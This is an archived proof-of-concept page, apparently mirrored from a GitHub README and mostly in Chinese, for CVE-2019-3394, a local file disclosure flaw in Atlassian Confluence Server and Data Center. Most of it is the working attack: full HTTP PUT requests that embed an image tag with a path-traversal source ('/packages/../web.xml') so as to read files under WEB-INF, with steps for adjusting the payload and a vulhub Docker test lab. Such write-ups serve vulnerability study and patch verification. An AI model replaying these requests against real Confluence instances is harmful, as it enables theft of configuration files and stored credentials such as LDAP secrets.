Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2019-3394 PoC — Atlassian Confluence Server和Confluence Data Center 信任管理问题漏洞

Source
https://github.com/jas502n/CVE-2019-3394
Associated Vulnerability
Title:Atlassian Confluence Server和Confluence Data Center 信任管理问题漏洞 (CVE-2019-3394)
Description:Atlassian Confluence Server是澳大利亚Atlassian公司的一套专业的企业知识管理与协同软件,也可以用于构建企业WiKi。Confluence Data Center是Confluence Center的数据中心版本。 Atlassian Confluence Server和Confluence Data Center中存在安全漏洞。攻击者可利用该漏洞读取<install-directory>/confluence/WEB-INF目录下服务器上的任意文件,可能包括:配置文件,凭
Description
Confluence(<install-directory>/confluence/WEB-INF/)文件读取漏洞
Readme
# CVE-2019-3394
Confluence(install-directory>/confluence/WEB-INF/)文件读取漏洞


## BurpSuite Request

#### vuln_url http://10.10.20.166:8090/rest/api/content/65610?status=draft
```
PUT /rest/api/content/65610?status=draft HTTP/1.1
Host: 10.10.20.166:8090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json; charset=utf-8
X-Requested-With: XMLHttpRequest
Referer: http://10.10.20.166:8090/pages/resumedraft.action?draftId=65610&draftShareId=58f4ea64-a2bd-473d-93ce-157cf3c229f3
Content-Length: 490
Cookie: JSESSIONID=FFD0CA6A6268E12E69A566AAD965B17A
X-Forwarded-For: 127.0.0.1
Connection: close

{"status":"current","title":"test","space":{"key":"JAS"},"body":{"editor":{"value":"<p><img class=\"confluence-embedded-image confluence-external-resource\" style=\"max-height: 250px;\" src=\"http://10.10.20.166:8090/packages/../web.xml\" data-image-src=\"/packages/../web.xml\" /></p>","representation":"editor","content":{"id":"65610"}}},"id":"65610","type":"page","version":{"number":1,"minorEdit":true,"syncRev":"0.mlIer8AOrlZcj7dg7IWDwUc.5"},"ancestors":[{"id":"65586","type":"page"}]}
```
#### change

`src=\"http://10.10.20.166:8090/packages/../web.xml\"`

to

`src=\"/packages/../web.xml\"`

```
PUT /rest/api/content/65610?status=draft HTTP/1.1
Host: 10.10.20.166:8090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json; charset=utf-8
X-Requested-With: XMLHttpRequest
Referer: http://10.10.20.166:8090/pages/resumedraft.action?draftId=65610&draftShareId=58f4ea64-a2bd-473d-93ce-157cf3c229f3
Content-Length: 490
Cookie: JSESSIONID=FFD0CA6A6268E12E69A566AAD965B17A
X-Forwarded-For: 127.0.0.1
Connection: close

{"status":"current","title":"test","space":{"key":"JAS"},"body":{"editor":{"value":"<p><img class=\"confluence-embedded-image confluence-external-resource\" style=\"max-height: 250px;\" src=\"/packages/../web.xml\" data-image-src=\"/packages/../web.xml\" /></p>","representation":"editor","content":{"id":"65610"}}},"id":"65610","type":"page","version":{"number":1,"minorEdit":true,"syncRev":"0.mlIer8AOrlZcj7dg7IWDwUc.5"},"ancestors":[{"id":"65586","type":"page"}]}
```

## 0x00 简介

Confluence Server 和 Data Center 在页面导出功能中存在本地文件泄露漏洞:具有“添加页面”空间权限的远程攻击者,能够读取 <install-directory>/confluence/WEB-INF/ 目录下的任意文件。
该目录可能包含用于与其他服务集成的配置文件,可能会泄漏认证凭据,例如 LDAP 认证凭据或其他敏感信息。
  
  
### 漏洞影响版本:
6.1.0 <= version < 6.6.16
6.7.0 <= version < 6.13.7
6.14.0 <= version < 6.15.8
  
## 0x01 CVE-2019-3394漏洞复现过程
 
### 测试环境: Atlassian Confluence 6.10.2
 
`root@kali:~/vulhub/confluence/CVE-2019-3396# docker-compose up -d`

```
  root@kali:~/vulhub/confluence/CVE-2019-3396# docker-compose up -d
cve-2019-3396_db_1 is up-to-date
cve-2019-3396_web_1 is up-to-date
root@kali:~/vulhub/confluence/CVE-2019-3396# docker ps -a
CONTAINER ID        IMAGE                              COMMAND                  CREATED             STATUS              PORTS                                            NAMES
ab287d68d994        vulhub/confluence:6.10.2           "/docker-entrypoint.…"   2 hours ago         Up 2 hours          0.0.0.0:8090->8090/tcp, 8091/tcp                 cve-2019-3396_web_1
1f58f73d5349        postgres:10.7-alpine               "docker-entrypoint.s…"   2 hours ago         Up 2 hours          5432/tcp                                         cve-2019-3396_db_1

 ```
 
 `/opt/atlassian/confluence/confluence/WEB-INF`
 
 目录下的文件
 
 ```
 ./admin/longrunningtask-xml.vm
./WEB-INF/glue-config.xml
./WEB-INF/urlrewrite.xml
./WEB-INF/web.xml
./WEB-INF/decorators.xml
./WEB-INF/sitemesh.xml
./WEB-INF/lib/batik-xml-1.9.jar
./WEB-INF/lib/xml-apis-ext-1.3.04.jar
./WEB-INF/lib/atlassian-secure-xml-3.2.11.jar
./WEB-INF/lib/xmlrpc-supplementary-character-support-0.2.jar
./WEB-INF/lib/xmlgraphics-commons-2.2.jar
./WEB-INF/lib/xmlrpc-2.0+xmlrpc61.1+sbfix.jar
./WEB-INF/classes/seraph-config.xml
./WEB-INF/classes/seraph-paths.xml
./importexport/includes/export-xml.vm
./search/osd.xml
./META-INF/maven/com.atlassian.confluence/confluence-webapp/pom.xml
```


## 参考链接:

https://github.com/vulhub/vulhub/blob/master/confluence/CVE-2019-3396/README.md
File Snapshot

 [4.0K]  /data/pocs/6a5138140fa31e4786f493b7029eb32438669b5b
└── [4.6K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.